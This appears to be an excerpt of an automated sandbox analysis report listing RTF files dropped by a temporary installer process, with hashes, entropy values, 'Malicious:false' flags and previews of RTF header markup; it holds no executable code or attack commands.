                                                                                                                                                                                                                                                          Entropy (8bit):5.01810800814238
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2rFexbO6zLpzBDlmvTpIq7GHAR1BgpGk1WhWHi2mM47g0qO2ug04+2WNvg0tQ5qD:2rYbRs7d9ZvIA9t
                                                                                                                                                                                                                                                          MD5:6E75BBD29A0618A73B2937F650F0F678
                                                                                                                                                                                                                                                          SHA1:93EDB94323E37DDD1EC717F4A492442B6B611E3B
                                                                                                                                                                                                                                                          SHA-256:718470BBCEF949095939C54CECB91D117D255A5279D55A204664CE52D1235180
                                                                                                                                                                                                                                                          SHA-512:91C452D52360B231869031CB61255E83AF5D95D0F8C3A2AA0419AF659766E6E1CF4FD16FCE7C85A5EA5164E05C84282D0AA019FCAD85E292BE6D71400FA5D88E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \froman\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Serif{\*\falt MS PMincho};}{\f40\fbidi \fswiss\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Sans{\*\falt Arial};}..{\f41\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}WenQuanYi Micro Hei{\*\falt MS Mincho};}{\f42\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}Lohit Hindi{\*\falt MS Mincho};}..{\f315\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):11858
                                                                                                                                                                                                                                                          Entropy (8bit):4.924418755277587
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:F9jmDF3222K2a2O2G2y2E2+2L6z6C6D6E6f6E6O6Y6goaB7lE9mNUrloY1gTEzGS:Hq53222K2a2O2G2y2E2+2L6z6C6D6E6u
                                                                                                                                                                                                                                                          MD5:D6E34C937850FDC0AB38B06FE809B95C
                                                                                                                                                                                                                                                          SHA1:A4480E9E250F5C3DC5BDD69696AB9F6EB12E8A56
                                                                                                                                                                                                                                                          SHA-256:355420286A6BCDB2190129A5507012B55DC41FB0660ACE771D09F6E60FAFA173
                                                                                                                                                                                                                                                          SHA-512:47F77867C8A5746DF79A29ABA70360BB2DF54F41C08B4B15E831421F76F24DC6B6AF0EE837084E5DDED8DAE3B549AD3236B5D668852BF357F990244FCE2E9D05
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq2\fcharset128 Arial;}{\f6\froman\fprq0\fcharset128 Arial;}{\f7\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f8\fnil\fprq2\fcharset128 Lohit Hindi;}{\f9\fnil\fprq0\fcharset128 Lohit Hindi;}{\f10\fnil\fprq0\fcharset128 Times New Roman;}{\f11\fnil\fprq2\fcharset128 Arial;}{\f12\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red255\green0\blue0;\red54\green95\blue145;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af7\langfe2052\dbch\af8\afs24\alang1081\loch\f3\fs24\lang1040 Predefinito;}.{\s2\sbasedon15\snext16\ilvl1\outlinelevel1\ql\widctlpar\faauto\li0\ri0\lin0\rin0\fi0\sb100\sa100\keepn\b\hich\
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):6776
                                                                                                                                                                                                                                                          Entropy (8bit):4.952214417097897
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:su76z6C6D6E6f6E6O6Y6K222K2a2O2G2y2E2+2PuADGE7lqWiNBXa98XP00PDDP:X6z6C6D6E6f6E6O6Y6K222K2a2O2G2yp
                                                                                                                                                                                                                                                          MD5:1BD6D948821BAAD56E7BD929CE99BC3E
                                                                                                                                                                                                                                                          SHA1:87753F34928DF1FDCE8D2AE17A734E2D032B7392
                                                                                                                                                                                                                                                          SHA-256:179807CC391D4A379560F1E9119C44DBD0F8BABD7C9581758DDFD2C24D15CCA5
                                                                                                                                                                                                                                                          SHA-512:CD8934815BBF3C6AA344CEDCA40732E4428DECC0F122F124B3AECD1720BA89A7D5A9BA0EE8AE4675C57C56B3ABFC44BB2AF2A868111ED7D23D156BCEAF0D6ADF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq2\fcharset128 Arial;}{\f6\froman\fprq0\fcharset128 Arial;}{\f7\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f8\fnil\fprq2\fcharset128 Lohit Hindi;}{\f9\fnil\fprq0\fcharset128 Lohit Hindi;}{\f10\fnil\fprq2\fcharset128 Arial;}{\f11\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af7\langfe2052\dbch\af8\afs24\alang1081\loch\f3\fs24\lang1040 Predefinito;}.{\s15\sbasedon0\snext16\sb240\sa120\keepn\hich\af7\dbch\af8\afs28\loch\f4\fs28 Intestazione;}.{\s16\sbasedon0\snext16\sb0\sa120 Corpo testo;}.{\s17\sbasedon16\snext17\sb0\sa120\dbch\af9 Elenco;}.{\s18\
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7640
                                                                                                                                                                                                                                                          Entropy (8bit):4.942902125699651
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:6L1GSkFI222K2a2O2G2y2E2+2L6z6C6D6E6f6E6O6Y60yM4Nr2R7sB4OYWkXp+Mm:0sFI222K2a2O2G2y2E2+2L6z6C6D6E6u
                                                                                                                                                                                                                                                          MD5:58A7AD4E00C3C48CAC983EAB83D93722
                                                                                                                                                                                                                                                          SHA1:16790F7FED7A5490C15C6A25CD9851B4953E4CF0
                                                                                                                                                                                                                                                          SHA-256:AE872798A7D87EFC10BA3FC5FE65CB5539F84548163F6DB7278705CE4802A0D4
                                                                                                                                                                                                                                                          SHA-512:D609EA322D6AEF1C3EF5E38C749B9C9D168F9865111ACB8F2408D752C20CCE5E5658CD08EB5D2FE79E4627FC0290B33B0D73858FCC821A9D9981009E27EA96C1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\fswiss\fprq0\fcharset128 Calibri;}{\f6\froman\fprq0\fcharset128 Tahoma;}{\f7\froman\fprq0\fcharset128 Calibri;}{\f8\froman\fprq2\fcharset128 Arial;}{\f9\froman\fprq0\fcharset128 Arial;}{\f10\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f11\fnil\fprq2\fcharset128 Lohit Hindi;}{\f12\fnil\fprq0\fcharset128 Lohit Hindi;}{\f13\fnil\fprq0\fcharset128 Times New Roman;}{\f14\fnil\fprq0\fcharset128 Courier New Baltic;}{\f15\fnil\fprq2\fcharset128 Arial;}{\f16\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af10\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang1040
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):17786
                                                                                                                                                                                                                                                          Entropy (8bit):4.892369802650086
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:TQ5h222K2a2O2G2y2E2+2L6z+CSD6E+fSE6O+YSY6z+CSD6E+fSE6O+YSS6z6C6w:TQ5h7HvTrbVLWsXixqh/1JsXixqh/1X+
                                                                                                                                                                                                                                                          MD5:B7BE54FA07192D11B0624600C99D449E
                                                                                                                                                                                                                                                          SHA1:372509E74C98F5BAE5A50088B4AA1B18711C834F
                                                                                                                                                                                                                                                          SHA-256:0F599243F6282C72AAC90EEF278B4F7BD5B78161508E494ABAC24E719702DDDB
                                                                                                                                                                                                                                                          SHA-512:20C131AE058B058F60D97E21D7E49BAB6FEC975229AFF7302F6559975CEA91F81130F8D1C15E7200A53A61AFB935FE7B3D608838AA0190A42D09D02C168CFE1C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq0\fcharset128 Calibri;}{\f6\froman\fprq2\fcharset128 Arial;}{\f7\froman\fprq0\fcharset128 Arial;}{\f8\froman\fprq2\fcharset128 Calibri;}{\f9\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f10\fnil\fprq2\fcharset128 Lohit Hindi;}{\f11\fnil\fprq0\fcharset128 Lohit Hindi;}{\f12\fnil\fprq0\fcharset128 Times New Roman;}{\f13\fnil\fprq2\fcharset128 Arial;}{\f14\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red255\green0\blue0;\red0\green32\blue96;\red35\green0\blue220;\red0\green69\blue134;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af9\langfe2052\dbch\af10\afs24\alang1081\loch\f3\fs24\lang1040 Pr
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9082
                                                                                                                                                                                                                                                          Entropy (8bit):4.946432574686308
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:I2KrPDFr222K2a2O2G2y2E2+2L9jn9js9j39jX9jR9jp9j+9j79ja6z6C6D6E6fp:7Q5r222K2a2O2G2y2E2+2L9jn9js9j3u
                                                                                                                                                                                                                                                          MD5:54A49395929B70CCABC6247E0EA0F779
                                                                                                                                                                                                                                                          SHA1:E522282035DAFE7216BF45CC21762172914D5949
                                                                                                                                                                                                                                                          SHA-256:544C05722BA2824B871D8DC37CC442BF791C266F0E90D96C9A06BF3195D90AFA
                                                                                                                                                                                                                                                          SHA-512:8111740D216DC20333574D61B4C3B39288846315B1EC0214E91B9633D5B48AF8EDF51C77432D0D1FAB10B961D81E6AA4ED981661D37E41DF3E9DD05C9B746DB4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq2\fcharset128 Arial;}{\f6\froman\fprq0\fcharset128 Arial;}{\f7\froman\fprq2\fcharset128 Arial CYR;}{\f8\froman\fprq0\fcharset128 Arial CYR;}{\f9\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f10\fnil\fprq2\fcharset128 Lohit Hindi;}{\f11\fnil\fprq0\fcharset128 Lohit Hindi;}{\f12\fnil\fprq0\fcharset128 Times New Roman;}{\f13\fnil\fprq2\fcharset128 Arial;}{\f14\fnil\fprq0\fcharset128 Arial;}{\f15\fnil\fprq2\fcharset128 Cambria Math;}{\f16\fnil\fprq0\fcharset128 Cambria Math;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af9\langfe2052\dbch\af10\afs24\alang1081\loch\f3\fs24\lang104
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9082
                                                                                                                                                                                                                                                          Entropy (8bit):4.946432574686308
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:I2KrPDFr222K2a2O2G2y2E2+2L9jn9js9j39jX9jR9jp9j+9j79ja6z6C6D6E6fp:7Q5r222K2a2O2G2y2E2+2L9jn9js9j3u
                                                                                                                                                                                                                                                          MD5:54A49395929B70CCABC6247E0EA0F779
                                                                                                                                                                                                                                                          SHA1:E522282035DAFE7216BF45CC21762172914D5949
                                                                                                                                                                                                                                                          SHA-256:544C05722BA2824B871D8DC37CC442BF791C266F0E90D96C9A06BF3195D90AFA
                                                                                                                                                                                                                                                          SHA-512:8111740D216DC20333574D61B4C3B39288846315B1EC0214E91B9633D5B48AF8EDF51C77432D0D1FAB10B961D81E6AA4ED981661D37E41DF3E9DD05C9B746DB4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq2\fcharset128 Arial;}{\f6\froman\fprq0\fcharset128 Arial;}{\f7\froman\fprq2\fcharset128 Arial CYR;}{\f8\froman\fprq0\fcharset128 Arial CYR;}{\f9\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f10\fnil\fprq2\fcharset128 Lohit Hindi;}{\f11\fnil\fprq0\fcharset128 Lohit Hindi;}{\f12\fnil\fprq0\fcharset128 Times New Roman;}{\f13\fnil\fprq2\fcharset128 Arial;}{\f14\fnil\fprq0\fcharset128 Arial;}{\f15\fnil\fprq2\fcharset128 Cambria Math;}{\f16\fnil\fprq0\fcharset128 Cambria Math;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af9\langfe2052\dbch\af10\afs24\alang1081\loch\f3\fs24\lang104
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):11858
                                                                                                                                                                                                                                                          Entropy (8bit):4.924418755277587
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:F9jmDF3222K2a2O2G2y2E2+2L6z6C6D6E6f6E6O6Y6goaB7lE9mNUrloY1gTEzGS:Hq53222K2a2O2G2y2E2+2L6z6C6D6E6u
                                                                                                                                                                                                                                                          MD5:D6E34C937850FDC0AB38B06FE809B95C
                                                                                                                                                                                                                                                          SHA1:A4480E9E250F5C3DC5BDD69696AB9F6EB12E8A56
                                                                                                                                                                                                                                                          SHA-256:355420286A6BCDB2190129A5507012B55DC41FB0660ACE771D09F6E60FAFA173
                                                                                                                                                                                                                                                          SHA-512:47F77867C8A5746DF79A29ABA70360BB2DF54F41C08B4B15E831421F76F24DC6B6AF0EE837084E5DDED8DAE3B549AD3236B5D668852BF357F990244FCE2E9D05
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq2\fcharset128 Arial;}{\f6\froman\fprq0\fcharset128 Arial;}{\f7\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f8\fnil\fprq2\fcharset128 Lohit Hindi;}{\f9\fnil\fprq0\fcharset128 Lohit Hindi;}{\f10\fnil\fprq0\fcharset128 Times New Roman;}{\f11\fnil\fprq2\fcharset128 Arial;}{\f12\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red255\green0\blue0;\red54\green95\blue145;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af7\langfe2052\dbch\af8\afs24\alang1081\loch\f3\fs24\lang1040 Predefinito;}.{\s2\sbasedon15\snext16\ilvl1\outlinelevel1\ql\widctlpar\faauto\li0\ri0\lin0\rin0\fi0\sb100\sa100\keepn\b\hich\
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47653
                                                                                                                                                                                                                                                          Entropy (8bit):5.01810800814238
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2rFexbO6zLpzBDlmvTpIq7GHAR1BgpGk1WhWHi2mM47g0qO2ug04+2WNvg0tQ5qD:2rYbRs7d9ZvIA9t
                                                                                                                                                                                                                                                          MD5:6E75BBD29A0618A73B2937F650F0F678
                                                                                                                                                                                                                                                          SHA1:93EDB94323E37DDD1EC717F4A492442B6B611E3B
                                                                                                                                                                                                                                                          SHA-256:718470BBCEF949095939C54CECB91D117D255A5279D55A204664CE52D1235180
                                                                                                                                                                                                                                                          SHA-512:91C452D52360B231869031CB61255E83AF5D95D0F8C3A2AA0419AF659766E6E1CF4FD16FCE7C85A5EA5164E05C84282D0AA019FCAD85E292BE6D71400FA5D88E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \froman\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Serif{\*\falt MS PMincho};}{\f40\fbidi \fswiss\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Sans{\*\falt Arial};}..{\f41\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}WenQuanYi Micro Hei{\*\falt MS Mincho};}{\f42\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}Lohit Hindi{\*\falt MS Mincho};}..{\f315\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):64122
                                                                                                                                                                                                                                                          Entropy (8bit):5.005532059876539
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2NFM7S0LzLpzBDlmvMuLoPxsMOaWAebaTkPYxmjyzZNBPirmqCadCg0WOxuiOQYX:2N4Sqse5bhHsTs64pPIA98
                                                                                                                                                                                                                                                          MD5:20DED089CE49980F6BA7C2DDFBB4A359
                                                                                                                                                                                                                                                          SHA1:A80EB4246514293DC65C07621B04DB34434DA4FB
                                                                                                                                                                                                                                                          SHA-256:7644F6129405227CC015DC574D41769A25B147A33792008A3BC97D6CA2B31F84
                                                                                                                                                                                                                                                          SHA-512:6863BF40030EE2FA1274103F637F1C8BD0601C5CF9C4EBE6684F13B7F1628B865D7297D464DD623CE50F7C0DFAB9B52CB42E8E6F6843D859469377DBFE68E5B5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \froman\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Serif{\*\falt MS PMincho};}{\f40\fbidi \fswiss\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Sans{\*\falt Arial};}..{\f41\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}WenQuanYi Micro Hei{\*\falt MS Mincho};}{\f42\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}Lohit Hindi{\*\falt MS Mincho};}..{\f43\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}@Wen
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7640
                                                                                                                                                                                                                                                          Entropy (8bit):4.942902125699651
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:6L1GSkFI222K2a2O2G2y2E2+2L6z6C6D6E6f6E6O6Y60yM4Nr2R7sB4OYWkXp+Mm:0sFI222K2a2O2G2y2E2+2L6z6C6D6E6u
                                                                                                                                                                                                                                                          MD5:58A7AD4E00C3C48CAC983EAB83D93722
                                                                                                                                                                                                                                                          SHA1:16790F7FED7A5490C15C6A25CD9851B4953E4CF0
                                                                                                                                                                                                                                                          SHA-256:AE872798A7D87EFC10BA3FC5FE65CB5539F84548163F6DB7278705CE4802A0D4
                                                                                                                                                                                                                                                          SHA-512:D609EA322D6AEF1C3EF5E38C749B9C9D168F9865111ACB8F2408D752C20CCE5E5658CD08EB5D2FE79E4627FC0290B33B0D73858FCC821A9D9981009E27EA96C1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\fswiss\fprq0\fcharset128 Calibri;}{\f6\froman\fprq0\fcharset128 Tahoma;}{\f7\froman\fprq0\fcharset128 Calibri;}{\f8\froman\fprq2\fcharset128 Arial;}{\f9\froman\fprq0\fcharset128 Arial;}{\f10\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f11\fnil\fprq2\fcharset128 Lohit Hindi;}{\f12\fnil\fprq0\fcharset128 Lohit Hindi;}{\f13\fnil\fprq0\fcharset128 Times New Roman;}{\f14\fnil\fprq0\fcharset128 Courier New Baltic;}{\f15\fnil\fprq2\fcharset128 Arial;}{\f16\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af10\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang1040
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):11086
                                                                                                                                                                                                                                                          Entropy (8bit):4.962530121956413
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:R2KwSyFd222K2a2O2G2y2E2+2L6z6C6D6E6f6E6O6Y6Y9jl9ju9jV9j19j/9jX9C:Mrpd222K2a2O2G2y2E2+2L6z6C6D6E6h
                                                                                                                                                                                                                                                          MD5:74D21CC581EFD9F3D31C02D2AD6A7881
                                                                                                                                                                                                                                                          SHA1:701EEEA34850D7EE69EFF56E2344A79A7EAD147E
                                                                                                                                                                                                                                                          SHA-256:9F632C17885E51A74C7875780F422952F1BC64DB978D8EBA765251F692C603E3
                                                                                                                                                                                                                                                          SHA-512:97EC2913358966E62D5D69BD63D0D3C378457BE371702957F25358BAB2DD1C514F92AF769C4FA1A1A4CD3B23F1F7C0358E7B838CC80163CF78775634D4CAC8A4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
